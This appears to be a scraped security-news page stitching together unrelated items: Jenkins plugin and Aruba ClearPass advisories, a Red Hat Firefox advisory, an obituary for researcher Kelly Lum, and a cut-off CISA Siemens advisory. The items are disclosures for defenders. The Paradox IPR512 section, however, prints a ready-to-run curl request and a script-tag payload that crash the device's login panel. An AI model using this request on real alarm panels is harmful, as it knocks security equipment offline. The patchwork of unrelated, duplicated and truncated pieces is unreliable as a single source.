Jenkins AbsInt a³ Plugin 1.1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   AbsInt a³ Plugin
*   Convert To Pipeline Plugin
*   Cppcheck Plugin
*   Crap4J Plugin
*   JaCoCo Plugin
*   Mashup Portlets Plugin
*   OctoPerf Load Testing Plugin Plugin
*   OctoPerf Load Testing Plugin Plugin
*   OctoPerf Load Testing Plugin Plugin
*   Performance Publisher Plugin
*   Phabricator Differential Plugin
*   Pipeline Aggregator View Plugin
*   remote-jobs-view-plugin Plugin
*   Role-based Authorization Strategy Plugin
*   Visual Studio Code Metrics Plugin

**Descriptions****Incorrect permission checks in Role-based Authorization Strategy Plugin**

**SECURITY-3053 / CVE-2023-28668**  
**Severity (CVSS):** Medium  
**Affected plugin: role-strategy**  
**Description:**

Permissions in Jenkins can be enabled and disabled. Some permissions are disabled by default, e.g., Overall/Manage or Item/Extended Read. Disabled permissions cannot be granted directly, only through greater permissions that imply them (e.g., Overall/Administer or Item/Configure).

Role-based Authorization Strategy Plugin 587.v2872c41fa\_e51 and earlier grants permissions even after they’ve been disabled.

This allows attackers to have greater access than they’re entitled to after the following operations took place:

1.  A permission is granted to attackers directly or through groups.
    
2.  The permission is disabled, e.g., through the script console.
    

Role-based Authorization Strategy Plugin 587.588.v850a\_20a\_30162 does not grant disabled permissions.

**Stored XSS vulnerability in JaCoCo Plugin**

**SECURITY-3061 / CVE-2023-28669**  
**Severity (CVSS):** High  
**Affected plugin: jacoco**  
**Description:**

JaCoCo Plugin 3.3.2 and earlier does not escape class and method names shown on the UI.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control input files for the 'Record JaCoCo coverage report' post-build action.

JaCoCo Plugin 3.3.2.1 escapes class and method names shown on the UI.

**Stored XSS vulnerability in Pipeline Aggregator View Plugin**

**SECURITY-2885 / CVE-2023-28670**  
**Severity (CVSS):** High  
**Affected plugin: pipeline-aggregator-view**  
**Description:**

Pipeline Aggregator View Plugin 1.13 and earlier does not escape a variable representing the current view’s URL in inline JavaScript.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.

Pipeline Aggregator View Plugin 1.14 obtains the current URL in a way not susceptible to XSS.

**CSRF vulnerability in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (1) / CVE-2023-28671**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.0 and earlier does not require POST requests for a connection test HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

OctoPerf Load Testing Plugin Plugin 4.5.1 requires POST requests for the affected connection test HTTP endpoint.

**Missing permission check in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (2) / CVE-2023-28672**  
**Severity (CVSS):** High  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.1 and earlier does not perform a permission check in a connection test HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

OctoPerf Load Testing Plugin Plugin 4.5.2 properly performs a permission check when accessing the affected connection test HTTP endpoint.

**Missing permission check in OctoPerf Load Testing Plugin Plugin allows enumerating credentials IDs**

**SECURITY-3067 (3) / CVE-2023-28673**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in OctoPerf Load Testing Plugin Plugin 4.5.3 requires the appropriate permissions.

**CSRF vulnerability and missing permission checks in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (4) / CVE-2023-28674 (CSRF), CVE-2023-28675 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to a previously configured Octoperf server using attacker-specified credentials.

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

OctoPerf Load Testing Plugin Plugin 4.5.3 requires POST requests and the appropriate permissions for the affected HTTP endpoints.

**CSRF vulnerability in Convert To Pipeline Plugin results in RCE**

**SECURITY-2963 / CVE-2023-28676**  
**Severity (CVSS):** High  
**Affected plugin: convert-to-pipeline**  
**Description:**

Convert To Pipeline Plugin 1.0 and earlier does not require POST requests for the HTTP endpoint converting a Freestyle project to Pipeline, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to create a Pipeline based on a Freestyle project. Combined with SECURITY-2966, this can result in the execution of unsandboxed Pipeline scripts.

**Command injection vulnerability in Convert To Pipeline Plugin results in RCE**

**SECURITY-2966 / CVE-2023-28677**  
**Severity (CVSS):** High  
**Affected plugin: convert-to-pipeline**  
**Description:**

Convert To Pipeline Plugin 1.0 and earlier uses basic string concatenation to convert Freestyle projects' Build Environment, Build Steps, and Post-build Actions to the equivalent Pipeline step invocations.

This allows attackers able to configure Freestyle projects to prepare a crafted configuration that injects Pipeline script code into the (unsandboxed) Pipeline resulting from a conversion by Convert To Pipeline Plugin. If an administrator converts the Freestyle project to a Pipeline, the script will be pre-approved.

**Stored XSS vulnerability in Cppcheck Plugin**

**SECURITY-2809 / CVE-2023-28678**  
**Severity (CVSS):** High  
**Affected plugin: cppcheck**  
**Description:**

Cppcheck Plugin 1.26 and earlier does not escape file names from Cppcheck report files before showing them on the Jenkins UI.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control report file contents.

**Stored XSS vulnerability in Mashup Portlets Plugin**

**SECURITY-2813 / CVE-2023-28679**  
**Severity (CVSS):** High  
**Affected plugin: mashup-portlets-plugin**  
**Description:**

Mashup Portlets Plugin 1.1.2 and earlier provides the "Generic JS Portlet" feature that lets a user populate a portlet using a custom JavaScript expression.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.

**XXE vulnerability in Crap4J Plugin**

**SECURITY-2925 / CVE-2023-28680**  
**Severity (CVSS):** High  
**Affected plugin: crap4j**  
**Description:**

Crap4J Plugin 0.9 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control Crap Report file contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Visual Studio Code Metrics Plugin**

**SECURITY-2926 / CVE-2023-28681**  
**Severity (CVSS):** High  
**Affected plugin: vs-code-metrics**  
**Description:**

Visual Studio Code Metrics Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control VS Code Metrics File contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Performance Publisher Plugin**

**SECURITY-2928 / CVE-2023-28682**  
**Severity (CVSS):** High  
**Affected plugin: perfpublisher**  
**Description:**

Performance Publisher Plugin 8.09 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control PerfPublisher report files to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Phabricator Differential Plugin**

**SECURITY-2942 / CVE-2023-28683**  
**Severity (CVSS):** High  
**Affected plugin: phabricator-plugin**  
**Description:**

Phabricator Differential Plugin 2.1.5 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control coverage report file contents for the 'Post to Phabricator' post-build action to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in remote-jobs-view-plugin Plugin**

**SECURITY-2956 / CVE-2023-28684**  
**Severity (CVSS):** High  
**Affected plugin: remote-jobs-view-plugin**  
**Description:**

remote-jobs-view-plugin Plugin 0.0.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows authenticated attackers with Overall/Read permission to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in AbsInt a³ Plugin**

**SECURITY-2930 / CVE-2023-28685**  
**Severity (CVSS):** High  
**Affected plugin: absint-a3**  
**Description:**

AbsInt a³ Plugin 1.1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control 'Project File (APX)' contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**Severity**

*   SECURITY-2809: High
*   SECURITY-2813: High
*   SECURITY-2885: High
*   SECURITY-2925: High
*   SECURITY-2926: High
*   SECURITY-2928: High
*   SECURITY-2930: High
*   SECURITY-2942: High
*   SECURITY-2956: High
*   SECURITY-2963: High
*   SECURITY-2966: High
*   SECURITY-3053: Medium
*   SECURITY-3061: High
*   SECURITY-3067 (1): Medium
*   SECURITY-3067 (2): High
*   SECURITY-3067 (3): Medium
*   SECURITY-3067 (4): Medium

**Affected Versions**

*   **AbsInt a³ Plugin** up to and including 1.1.0
*   **Convert To Pipeline Plugin** up to and including 1.0
*   **Cppcheck Plugin** up to and including 1.26
*   **Crap4J Plugin** up to and including 0.9
*   **JaCoCo Plugin** up to and including 3.3.2
*   **Mashup Portlets Plugin** up to and including 1.1.2
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.0
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.1
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.2
*   **Performance Publisher Plugin** up to and including 8.09
*   **Phabricator Differential Plugin** up to and including 2.1.5
*   **Pipeline Aggregator View Plugin** up to and including 1.13
*   **remote-jobs-view-plugin Plugin** up to and including 0.0.3
*   **Role-based Authorization Strategy Plugin** up to and including 587.v2872c41fa\_e51
*   **Visual Studio Code Metrics Plugin** up to and including 1.7

**Fix**

*   **JaCoCo Plugin** should be updated to version 3.3.2.1
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.1
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.2
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.3
*   **Pipeline Aggregator View Plugin** should be updated to version 1.14
*   **Role-based Authorization Strategy Plugin** should be updated to version 587.588.v850a\_20a\_30162

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   AbsInt a³ Plugin
*   Convert To Pipeline Plugin
*   Cppcheck Plugin
*   Crap4J Plugin
*   Mashup Portlets Plugin
*   Performance Publisher Plugin
*   Phabricator Differential Plugin
*   remote-jobs-view-plugin Plugin
*   Visual Studio Code Metrics Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **CC Bomber, Kitri BoB** for SECURITY-2925, SECURITY-2926, SECURITY-2928, SECURITY-2930, SECURITY-2942, SECURITY-2963
*   **Daniel Beck, CloudBees, Inc. and Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2809
*   **Daniel Beck, CloudBees, Inc. and Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3053
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2885, SECURITY-3061
*   **LaNyer640 & Crilwa** for SECURITY-2956
*   **Valdes Che Zogou, CloudBees, Inc.** for SECURITY-2813
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-2966, SECURITY-3067 (1), SECURITY-3067 (2), SECURITY-3067 (3), SECURITY-3067 (4)

CVE-2023-28685: Jenkins Security Advisory 2023-03-21

A remote Cross-site Scripting vulnerability was discovered in HPE Integrated Lights-Out 6 (iLO 6), Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 4 (iLO 4). HPE has provided software updates to resolve this vulnerability in HPE Integrated Lights-Out.

CVE-2023-28083

A vulnerability exists in ClearPass Policy Manager that allows for an attacker with administrative privileges to access sensitive information in a cleartext format. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2023-003 CVE: CVE-2023-25589, CVE-2023-25590, CVE-2023-25591, CVE-2023-25592, CVE-2023-25593, CVE-2023-25594, CVE-2023-25595, CVE-2023-25596 Publication Date: 2023-Mar-14 Status: Confirmed Severity: Critical Revision: 1 Title ===== ClearPass Policy Manager Multiple Vulnerabilities Overview ======== Aruba has released updates to ClearPass Policy Manager that address multiple security vulnerabilities. Affected Products ================= These vulnerabilities affect ClearPass Policy Manager running the following software versions unless specifically noted otherwise in the details section: - ClearPass Policy Manager 6.11.x: 6.11.1 and below - ClearPass Policy Manager 6.10.x: 6.10.8 and below - ClearPass Policy Manager 6.9.x: 6.9.13 and below Versions of ClearPass Policy Manager that are end of life are affected by these vulnerabilities unless otherwise indicated. Unaffected Products =================== Any other Aruba products not specifically listed above are not affected by these vulnerabilities. Details ======= Unauthenticated Arbitrary User Creation Leads to Complete System Compromise (CVE-2023-25589) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to create arbitrary users on the platform. A successful exploit allows an attacker to achieve total cluster compromise. Internal references: ATLCP-229 Severity: Critical CVSSv3 Overall Score: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: This vulnerability was discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Local Privilege Escalation in ClearPass OnGuard Linux Agent (CVE-2023-25590) --------------------------------------------------------------------- A vulnerability in the ClearPass OnGuard Linux agent could allow malicious users on a Linux instance to elevate their user privileges to those of a higher role. A successful exploit allows malicious users to execute arbitrary code with root level privileges on the Linux instance. Internal references: ATLCP-235 Severity: High CVSSv3 Overall Score: 7.8 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Discovery: This vulnerability was discovered and reported by Luke Young (bugcrowd.com/bored\_engineer) via Aruba's Bug Bounty Program. Authenticated Information Disclosure in ClearPass Policy Manager Web-Based Management Interface (CVE-2023-25591) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager could allow a remote attacker authenticated with low privileges to access sensitive information. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further privileges on the ClearPass instance. Internal Reference: ATLCP-224 Severity: High CVSSv3.x Overall Score: 7.6 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L Discovery: This vulnerability was discovered and reported by Luke Young (bugcrowd.com/bored\_engineer) via Aruba's Bug Bounty program. Reflected Cross Site Scripting Vulnerabilities (XSS) in ClearPass Policy Manager Web-Based Management Interface (CVE-2023-25592, CVE-2023-25593) --------------------------------------------------------------------- Vulnerabilities within the web-based management interface of ClearPass Policy Manager could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface. Internal Reference: ATLCP-170, ATLCP-228 Severity: High CVSSv3.x Overall Score: 7.1 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L Discovery: These vulnerabilities were discovered and reported by the AT&T Security Team and Sicarius(@EIS1carius) of CBP. Authorization Bypass Leading to Privilege Escalation in ClearPass Policy Manager Web-Based Management Interface (CVE-2023-25594) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager allows an attacker with read-only privileges to perform actions that change the state of the ClearPass Policy Manager instance. Successful exploitation of this vulnerability allows an attacker to complete state-changing actions in the web-based management interface that should not be allowed by their current level of authorization on the platform. Internal References: ATLCP-237 Severity: Medium CVSSv3.x Overall Score: 6.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by the Aruba ClearPass Policy Manager engineering team. Sensitive Information Disclosure in ClearPass OnGuard Ubuntu Agent (CVE-2023-25595) --------------------------------------------------------------------- A vulnerability exists in the ClearPass OnGuard Ubuntu agent that allows for an attacker with local Ubuntu instance access to potentially obtain sensitive information. Successful Exploitation of this vulnerability allows an attacker to retrieve information that is of a sensitive nature to the ClearPass/OnGuard environment. Internal Reference: ATLCP-231 Severity: Medium CVSSv3.x Overall Score: 5.5 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N Discovery: This vulnerability was discovered and reported by the security team at Airowire Networks. Authenticated Sensitive Information Disclosure in ClearPass Policy Manager (CVE-2023-25596) --------------------------------------------------------------------- A vulnerability exists in ClearPass Policy Manager that allows for an attacker with administrative privileges to access sensitive information in a cleartext format. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager. Internal Reference: ATLCP-236 Severity: Medium CVSSv3.x Overall Score: 4.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N Discovery: This vulnerability was discovered and reported by the Aruba ClearPass Policy Manager engineering team. Resolution ========== Upgrade ClearPass Policy Manager to one of the following versions with the fixes to resolve all issues noted in the details section. - ClearPass Policy Manager 6.11.x: 6.11.2 and above - ClearPass Policy Manager 6.10.x: 6.10.8 Hotfix 1 for Security Issues and above - ClearPass Policy Manager 6.9.x: 6.9.13 Hotfix 1 for Security Issues and above Aruba does not evaluate or patch ClearPass Policy Manager versions that have reached their End of Support (EoS) milestone. Supported versions as of the publication date of this advisory are: - ClearPass Policy Manager 6.11.x - ClearPass Policy Manager 6.10.x - ClearPass Policy Manager 6.9.x For more information about Aruba's End of Support policy visit: https://www.arubanetworks.com/support-services/end-of-life/ Workaround ========== To minimize the likelihood of an attacker exploiting these vulnerabilities, Aruba recommends that the CLI and web-based management interfaces for ClearPass Policy Manager be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above. ClearPass Policy Manager Security Hardening =========================================== For general information on hardening ClearPass Policy Manager instances against security threats please see the ClearPass Policy Manager Hardening Guide. For ClearPass 6.11.x, the ClearPass Policy Manager Hardening guide is available at https://www.arubanetworks.com/techdocs/ClearPass/6.11/PolicyManager/Content/home.htm For ClearPass 6.10.x, the ClearPass Policy Manager Hardening Guide is available at https://www.arubanetworks.com/techdocs/ClearPass/6.10/PolicyManager/Content/home.htm For ClearPass 6.9.x and earlier, the ClearPass Policy Manager Hardening Guide is available at https://support.hpe.com/hpesc/public/docDisplay?docId=a00091066en\_us Exploitation and Public Discussion ================================== Aruba is not aware of any public discussion or exploit code that target these specific vulnerabilities as of the release date of the advisory. Revision History ================ Revision 1 / 2023-Mar-14 / Initial release Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products and obtaining assistance with security incidents is available at: https://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: https://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2023 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQFLBAEBCAA1FiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAmPrwloXHHNpcnRAYXJ1 YmFuZXR3b3Jrcy5jb20ACgkQmP4JykWFhtn3fAf9FZrjMvaOrkxt/z5xyPj4duc5 GB/SRNmxkr+Jepd3bOdnIDcPV6Yx7qtVzBQq1RRla9b7KzvFhaiKzuIAwFoDCW5f bJbqlCk4zptkbCGJVPERqd5W0Srt2eNz7LA7yaHEhcjkF7xcYszkacW8fbULZPZg 0AZ/baATIYrEiyIW7W1VECySd7wLMdo3+mU57ZL+rVrecLyIpp7WYG8PIncM0eZ2 N7zmSdv5SkhhNILwP5WO18MP8dz2+DZOw33f1ZMfc3BOhKuc9UOgcK3DpuWHLhs4 dnGqk4szq6DftN76MbsrBwVcLpQ6O9TMEvyhS8KjLYqzrVvqp1hNAQ6dSevFNQ== =p1jl -----END PGP SIGNATURE-----

CVE-2023-25596

An issue found in Paradox Security Systems IPR512 allows attackers to cause a denial of service via the login.html and login.xml parameters.

**Injection vulnerability in Paradox Security Systems IPR512**

In Paradox Security System IPR512 Web console login form page, attacker can input JavaScript string, e.g. </script> or <script>alert('xss')</script> that will overwrite configurations in the file "login.xml" and cause the login form to crash and make it unavailable.

**1\. The Paradox Security Systems IPR512 webpanel is accessible and the login form is available.**

**2\. Sending login request with injection JavaScript string.**

**3\. The login.xml file is overwritten**

**4\. The webpanel login form is crashed and isn't accessible anymore.**

**cURL code for executing the vulnerability:**

curl -i -s -k -X $'GET' \ -H $'Host: <IP_ADDRESS/PORT>' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Accept-Language: en-US;q=0.9,en;q=0.8' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36' -H $'Connection: close' -H $'Cache-Control: max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"' -H $'Sec-CH-UA-Platform: Windows' -H $'Sec-CH-UA-Mobile: ?0' \ $'http://<IP_ADDRESS/PORT>/login.html?log_user=%3C%2Fscript%3E&log_passmd5='

Code injection vulnerability in login.html in Web panel login page on IPR512 of the Paradox Security Systems product that allows a remote or local attacker to cause the web panel login page crash via injecting easy JavaScript code into login form page such as </script>.

CVE-2023-24709: GitHub - SlashXzerozero/Injection-vulnerability-in-Paradox-Security-Systems-IPR512: In Paradox Security System IPR512 Web console login form page, attacker can input JavaScript string, e.g. "<script>a

The application security expert, who went by "@aloria," is being remembered for her brilliance and generosity, as tributes start to pour in honoring her life.

The cybersecurity sector is mourning the passing of security expert Kelly Lum, also widely known by her Twitter handle, @aloria.

SummerCon, one of the many cybersecurity organizations to which Lum lent her expertise over the years, was one of the first to share the news about her death. "It is with profound sadness that we mourn the loss of out friend and mentor, @aloria," the tweet from SummerCon said.

Lum was the director of information security at Service Channel, a position she held since 2019. She previously served an adjunct professor at New York University's Tandon School of Engineering, where she shared her vast experience in application security with a new generation of cybersecurity professionals. Lum was regularly featured at cybersecurity conferences, including Black Hat, where she served as a member of the Black Hat Advisory Board and as the Defense Track lead.

In 2014 at Black Hat USA, Lum, who was then a security engineer with Tumblr, teamed up with Zach Lanier, then-senior security researcher at Duo Security, to disclose their findings on dangerous cross-site scripting (XSS) and cross-site request forgery (CSRF) vulnerabilities in four commercial data loss prevention (DLP) products. 

Lum passed away "due to progressed critical illness, in a hospitalized setting surrounded by her family," SummerCon tweeted.

_**Editor's note:**_ _**Lum was a respected expert source to Dark Reading and a friend to many. She will be deeply missed.**_

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Renowned Researcher Kelly Lum Passes Away

Red Hat Security Advisory 2023-1337-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1337-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1337  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.9.0-3.el9_1.src.rpm

aarch64:  
firefox-102.9.0-3.el9_1.aarch64.rpm  
firefox-debuginfo-102.9.0-3.el9_1.aarch64.rpm  
firefox-debugsource-102.9.0-3.el9_1.aarch64.rpm  
firefox-x11-102.9.0-3.el9_1.aarch64.rpm

ppc64le:  
firefox-102.9.0-3.el9_1.ppc64le.rpm  
firefox-debuginfo-102.9.0-3.el9_1.ppc64le.rpm  
firefox-debugsource-102.9.0-3.el9_1.ppc64le.rpm  
firefox-x11-102.9.0-3.el9_1.ppc64le.rpm

s390x:  
firefox-102.9.0-3.el9_1.s390x.rpm  
firefox-debuginfo-102.9.0-3.el9_1.s390x.rpm  
firefox-debugsource-102.9.0-3.el9_1.s390x.rpm  
firefox-x11-102.9.0-3.el9_1.s390x.rpm

x86_64:  
firefox-102.9.0-3.el9_1.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el9_1.x86_64.rpm  
firefox-debugsource-102.9.0-3.el9_1.x86_64.rpm  
firefox-x11-102.9.0-3.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4dtzjgjWX9erEAQiCLA/9EQIrsyYlouTIW0DsRrnx+P4mS8u7qXCm  
6blO6pgZSm2hzqqEw8+M8mGlq6oGrYdd9GhT2qOYr0V/y4qxHeI6mk+ebCrL3Jq1  
YlTTfd/mLR38y2n+dEXIghNSCQ2pK4oeZ9XEbQ/U05Atrd/v1YP3YBQavF3tpbxb  
yH4EXqiQfWlyHpEpIrpsG39kKtV6kN+vgm2uA0bwMgfe+bq7yIJLVWlMRwhU+414  
s8CpsXQksSgRQLJtrDdMZ/IIYgtfeb6VAful3XFCVDBmVQskuDVNhviJSoJg4tp9  
AXXdgF/dMbXn7F73j/Rvn0GVXaurryXI6GeHNVrJ1lU0KhRyp8nZbSlTz+Px6le0  
FJrEuks8//YWtR1rHTd7J2Ytef+oE0xj65WLF7sULwIgV4aDjykOUP09WQ4pmjUf  
QsWBPwfpYdTQCuT4qaA63ZXzOn1NJZs9IyUckaMxhZ8m0NI+m1a3O5zfE7xRiAN1  
/dp/Rbt6LVwc3SFxQl8QZ1ebqeg5I5fZKgLKL7w6+MWu6bgif3zd7/HqumH+CJv6  
cgMbG6ZpTOW/cXcXXJzQ18kKhlG5JZajTT3KobY5QSi//553bFD4LRfFuskRRBFK  
Ol2kQy/fzpeUfTCIolh6VJCjrZ07eiDXEIn4hETmUc/Lto3owz9vnYCaGZFKM1Rm  
VZtQOLxSsOk=GR6W  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1337-01

As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
1. EXECUTIVE SUMMARY
CVSS v3 8.1
ATTENTION: Exploitable remotely 
Vendor: Siemens 
Equipment: Various third-party components used in SCALANCE W-700 devices 
